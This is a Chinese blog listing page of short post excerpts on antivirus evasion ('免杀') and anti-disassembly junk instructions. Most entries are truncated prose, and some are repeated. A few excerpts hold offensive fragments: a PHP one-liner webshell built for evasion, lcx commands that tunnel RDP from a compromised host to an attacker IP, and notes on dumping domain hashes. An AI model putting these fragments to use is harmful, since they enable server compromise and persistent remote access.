免杀_花指令

Android App 免杀教程

如何让你的app一直在运行状态呢?默认情况下,不做任何跨进程部署配置的话,每个androidapp运行在单独一个虚拟机上,每个虚拟机对应一个进程。当app被系统回收或者是被用户主动杀掉(通过app管理软件),进程就彻底退出了。在有些场景,app所在的进程退出了,我们希望还能做一些操作。比如,app被卸载后(卸载会先退出运行),我们希望跳转浏览器做一些卸载原因的调查问卷;或者为了优化体验,提高app
iRuoBin·2016-06-28 11:49

C语言中字节对齐

字节对齐:   字节对齐有助于加快计算机的取数速度,否则就得多花指令周期了。
ffmxnjm·2016-05-27 21:00

花指令

花指令是程序中的无用指令或者垃圾指令,故意干扰各种反汇编静态分析工具,但是程序不受任何影响,缺少了它也能正常运行。
zhuhuibeishadiao·2016-03-31 15:00

导出当前域内所有用户hash的技术整理

域控:server2008r2杀毒软件:已安装*域控权限:可使用netuse远程登陆,不使用33890x02测试方法:(1)mimikatz:hash数量:只能抓取登陆过的用户hash,无法抓取所有用户免杀
citelao·2016-03-21 17:11

Atitit.木马病毒的免杀原理---sikuli 的使用

Atitit.木马病毒的免杀原理---sikuli 的使用 1. 使用sikuli java api11.1. 3. Write code!12. 
attilaxAti·2016-03-11 20:00

Atitit.木马病毒的免杀原理---sikuli 的使用

Atitit.木马病毒的免杀原理---sikuli 的使用 1. 使用sikuli java api11.1. 3. Write code!12. 
attilaxAti·2016-03-11 20:00

Atitit.木马 病毒 免杀 技术 360免杀 杀毒软件免杀 原理与原则 attilax 总结

Atitit.木马 病毒 免杀 技术 360免杀 杀毒软件免杀 原理与原则 attilax 总结  1. ,免杀技术的用途21.1. 病毒木马的编写21.2. 
attilaxAti·2016-03-08 16:00

Atitit.木马 病毒 免杀 技术 360免杀 杀毒软件免杀 原理与原则 attilax 总结

Atitit.木马 病毒 免杀 技术 360免杀 杀毒软件免杀 原理与原则 attilax 总结  1. ,免杀技术的用途21.1. 病毒木马的编写21.2. 
attilaxAti·2016-03-08 16:00

Atitit.木马 病毒 免杀 技术 360免杀 杀毒软件免杀 原理与原则 attilax 总结

Atitit.木马 病毒 免杀 技术 360免杀 杀毒软件免杀 原理与原则 attilax 总结  1. ,免杀技术的用途21.1. 病毒木马的编写21.2. 
u010850027·2016-03-08 16:00

小甲鱼之浅谈杀与不杀

第一篇杀毒软件的查杀病毒的原理以及木马、病毒的免杀伎俩。
进击的陡壁·2016-02-18 14:00

抹除花指令

系统:Windowsxp程序: 2015_nctf_re程序下载地址:http://pan.baidu.com/s/1hryN1Wg要求:拆解Nag窗口&找出密钥使用工具:OD&IDA&PEID&HexWorkshop&CodeBlocks可在看雪论坛中找到关于此程序的讨论:http://bbs.pediy.com/showthread.php?t=199609&highlight=%E8%8A%
中二病也要写代码!·2016-02-16 15:00

抹除花指令

系统:Windowsxp程序: 2015_nctf_re程序下载地址:http://pan.baidu.com/s/1hryN1Wg要求:拆解Nag窗口&找出密钥使用工具:OD&IDA&PEID&HexWorkshop&CodeBlocks可在看雪论坛中找到关于此程序的讨论:http://bbs.pediy.com/showthread.php?t=199609&highlight=%E8%8A%
中二病也要写代码!·2016-02-16 15:00

抹除花指令

系统:Windowsxp程序: 2015_nctf_re程序下载地址:http://pan.baidu.com/s/1hryN1Wg要求:拆解Nag窗口&找出密钥使用工具:OD&IDA&PEID&HexWorkshop&CodeBlocks可在看雪论坛中找到关于此程序的讨论:http://bbs.pediy.com/showthread.php?t=199609&highlight=%E8%8A%
中二病也要写代码!·2016-02-16 15:00

JavaScript Phishing

0x01简介特点:通过cmd执行代码即可弹回shell优势:免杀简便较隐蔽利用思路:综合其优势特点,JavaScript作为PhishingPayload有着意想不到的效果,下面就结合相关漏洞做简要介绍
qq_27446553·2016-01-27 17:00

[免杀] Delphi 内嵌ASM获取kernel32.dll的模块句柄 XP/Vista/WIN7

///XP/Vista/WIN7以及X86/X64通吃functionKernel32Handle():HMODULE;{$IFDEFCPUX64}asm movrbx,$60 movrax,[gs:rbx]  //peb movrax,[rax+$18] //LDR movrax,[rax+$30] //InLoadOrderModuleList.Blink, movrax,[rax] //[_
伽罗kapple·2016-01-25 18:00

废土之王隐藏关卡怎么进 7个隐藏关卡进入方法

7处隐秘区域:1、绿洲(水下)在沙漠关(1-1、1-2、1-3)任意一关之中,开局尽量避免杀敌人,穿梭与敌军之中,寻找红箱子黄箱子绿罐子,把它们都打开(顺序不限)——然后Boss就会在附近冲出来,尽快秒掉他
佚名·2016-01-06 09:59

Windows x86 下的 静态代码混淆

而这篇文章就是学习如何手写”花指令“,来干扰ida的静态分析和”F5插件“。0x
_懒人·2015-11-17 17:00

花指令

可能非常多人都听说过花指令,但限于平时的开发所限,可能较少接触到。日前,跟同事讨论了一些有关花指令的问题,现将自己的体会总结一下。 这篇文章将讨论以下问题: 一、什么是花指
·2015-11-13 22:32

C++源代码免杀之函数的动态调用

最近也在学着修改Gh0st远控的源代码,源代码免杀起来还是方便、简单、有效和简单点。针对于输入输出表盯的比较紧的杀毒软件,最有效的还是进行函数动态调用。
·2015-11-12 18:22

Android应用源码安卓短信拦截木马项目源码

木马apk重新签名后手机360免杀
·2015-11-12 13:18

Delphi版木马彩衣一个简单的花指令伪装器--

附程序源码,有很多地方需要改进    {pe花指令加密,参考 fi7ke 的 PE花指令加密一文 Author:hnxyy QQ:19026695 2005.11.24  
·2015-11-12 12:30

免杀常用手段

首先做免杀大家都知道免杀分为文件免杀,内存免杀,和行为免杀
·2015-11-12 12:29

机械码,又称机器码.

一、搞免杀修改特征码需要熟练掌握的全部汇编知识一.机械码,又称机器码.ultraedit打开,编辑exe文件时你会看到许许多多的由0,1,2,3,4,5,6,7,8,9,A,B,C,D,E,F组成的数码
·2015-11-12 11:53

VBScript.Encode打造的免杀木马

        SCRENC.EXE这是一个运行在DOS   PROMAPT的命令工具,它使脚本设计者可以对最终的脚本进行编码,从而使   Web   主机和   Web   客户不能查看或修改它们的源代码。不过有一点需要注意的是加密后的程序要求用户的游览器必须使用Intern
·2015-11-12 10:25

花指令

可能非常多人都听说过花指令,但限于平时的开发所限,可能较少接触到。日前,跟同事讨论了一些有关花指令的问题,现将自己的体会总结一下。 这篇文章将讨论以下问题: 一、什么是花指
·2015-11-12 09:22

无逻辑注册分析

做个记录留给自己以后可以看看 // 无逻辑注册分析 01234567890123456789012345678901 假码 // 首先对程序进行脱壳 upx // 因为程序使用易语言编写 里边还加了花指令
·2015-11-11 12:51

局域网入侵检测过程详解

入侵工具:一般要用到三个:NTscan变态扫描器,Recton–D贺免杀专用版,DameWare迷你中文版 4.5. (前两个工具杀毒软件都会报毒,建议将杀毒软件实时防毒暂时关
·2015-11-11 11:26

利用网页挂马拿服务器的一种设想

步骤如下: 准备工作 1.做好远控木马,做好免杀,找个网马生成器生成网马。然后传到一个空间,并做好相应的加密过的JS引用文件。
·2015-11-11 08:15

驱动级的特征码修改——终级免杀之PcShare

当然是免杀。加壳是没用的,要改特征码。改文件和内存 特征码在前几
·2015-11-11 05:41

花指令

可能非常多人都听说过花指令,但限于平时的开发所限,可能较少接触到。日前,跟同事讨论了一些有关花指令的问题,现将自己的体会总结一下。 这篇文章将讨论以下问题: 一、什么是花指
·2015-11-11 03:09

nc.exe 使用方法

《nc.exe免杀版》瑞士***nc.exe下载附使用方法做网络安全测试在命令行下使用的网络监听工具。 
lilei754212328·2015-11-09 13:56

花指令

可能非常多人都听说过花指令,但限于平时的开发所限,可能较少接触到。日前,跟同事讨论了一些有关花指令的问题,现将自己的体会总结一下。 这篇文章将讨论以下问题: 一、什么是花指
·2015-11-09 13:43

主动嗅探器sniffact出炉

~任何想找的信息,只要你能分析因为专业课需要,我在做一个对联创进行重放攻击的程序时发现,底层嗅探部分已成套路,每次做重放攻击都要重新实现十分繁琐,而且C/C++虽然方便操作底层,但进行着些简单的操作未免杀鸡用牛刀
·2015-11-03 21:57

meterpreter

这促使我决定一窥meterpreter的究竟,以了解其工作原理和流程,从而方便自定义载荷进行免杀,或者予以改造做远控。后来发现,直
·2015-11-03 21:35

源码免杀笔记

最近没什么心情写博客,似乎停止不前了,唉,越来越懒了,不知道怎么回事,整理以前的笔记,这个免杀的,不知道内容过时了没。 各个杀毒软件查杀特点不一样,大致总结以下,API函数,字符串,代码段,资源段。
·2015-11-02 18:14

lcx源代码以及免杀的研究

之前和Random大神讨论了一下免杀的问题,他给出了一个比较不错的想法,使用debug版本发布可以过很多杀软。顺便看了下lcx的源码,发现其代码不算特别复杂,于是乎就在这分析一下。
·2015-11-02 14:04

用call ret实现花指令和跳转的例子

  代码 #include  < iostream.h > #include  < windows.h > void  main() {     DWORD p;     _asm     
·2015-11-02 13:11

花指令的原理和常用花指令收集

花指令的作用是对付静态分析,以下面一段程序说明一下花指令的原理 代码 #include  < iostream.h > #include  < windows.h
·2015-11-02 13:10

江民杀毒软件KV2008 正式版下载

全新研发推出的计算机反病毒与网络安全防护软件,是全球首家具有灾难恢复功能的智能主动防御杀毒软件.江民杀毒软件KV2008采用了新一代智能分级高速杀毒引擎,占用系统资源少,扫描速度得到了大幅提升,突破了“灾难恢复”和 “病毒免杀
·2015-11-02 09:55

网页解密

其实,网页脚本加密一般是用于网页木马的免杀,一般来说入侵者成功取得Webshell权限以后就会对整个网站进行批量挂马,其中挂马的语句大多是“iframe”,也有些为了隐蔽会插入Flash(geturl)
·2015-11-01 09:11

病毒木马凶猛啊!

还有盗QQ号码的所谓免杀木马,倒 N个IEXPLORE.EXE不停的启动,出错误,连接某些IP。TEMP目录下生成1.exe,2.exe.......症状太多了。
·2015-10-31 11:53

lcx.exe内网转发命令教程 + LCX免杀下载

  作者: 小健   本机: lcx -listen 2222 3333 2222为转发端口,3333为本机任意未被占用的端口 肉鸡:lcx -slave 119.75.217.56 2222 127.0.0.1 3389 119.75.217.56 为本机IP,2222为转发端口,127.0.0.1为肉鸡内网IP,3389为远程终端端口 3389连接时格式 12
·2015-10-30 15:44

一句话木马的免杀

在入侵过程中,我们常常会遇到这样的问题,因为大马太大,而不能上传,怎么办,这个时候就只能用小马来辅助,但是,小马的语句又被杀,今天我们来说说一句话小马的免杀方法。
·2015-10-27 15:13

汇编64讲(搞免杀、破解必看)在线观看

下载地址(也可以在线观看) mms://221.11.20.228/hbywjjk/1/000.asf mms://221.11.20.228/hbywjjk/2/000.asf mms://221.11.20.228/hbywjjk/3/000.asf mms://221.11.20.228/hbywjjk/4/000.asf mms://221.11.20.228/hbywjjk/5
·2015-10-27 14:02

为什么需要字节对齐?

计算机组成原理教导我们这样有助于加快计算机的取数速度,否则就得多花指令周期了。
·2015-10-23 09:56

关于php一句话免杀的分析<>

一开始想这样:   <?php $_GET['ts7']($_POST['cmd']);?> 客户端用菜刀,密码cmd,url为test.php?ts7=assert   这个应该算没有什么特征码了,但是缺点就是在web日志中会暴露出来assert   可以都用post:     <?php $_POST['ts7']($_POS
·2015-10-23 08:57

Armadillo穿山甲进阶(2009-04-13 23:14:36)

blog.sina.com.cn/s/blog_5f5742340100ctf6.htmlArmadillo穿山甲进阶 (2009-04-13 23:14:36) 标签: 杂谈  分类: 脱壳破解免杀
·2015-10-23 08:26

免杀修改特征码需要掌握的汇编知识

一.机械码,又称机器码 Ultraedit打开,编辑exe文件时你会看到许许多多的由0、1、2、3、4、5、6、7、8、9、A、B、C、D、E、F组成的数码,这些数码就是机器码。修改程序时必须通过修改机器码来修改exe文件。 二.需要熟练掌握的全部汇编知识 不大容易理解,可先强行背住,混个脸儿熟,以后慢慢的就理解了。 cmp a,b 比较a与b。 mov a,b 把b的
·2015-10-23 08:05

SQL语句直接开启3389

大家在渗透MSSQL服务器的时候,苦于无法上传开3389工具和3389工具不免杀时,可以使用此招轻松开启3389。
·2015-10-21 11:21

netcat 及其姐妹工具

可以用netcat clone 工具CryptCat,支持ssh,还免杀。 查询了一下,netcat还有很多功能更强的clone工具。
·2015-10-21 10:34
上一页 18 19 20 21 22 23 24 25 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他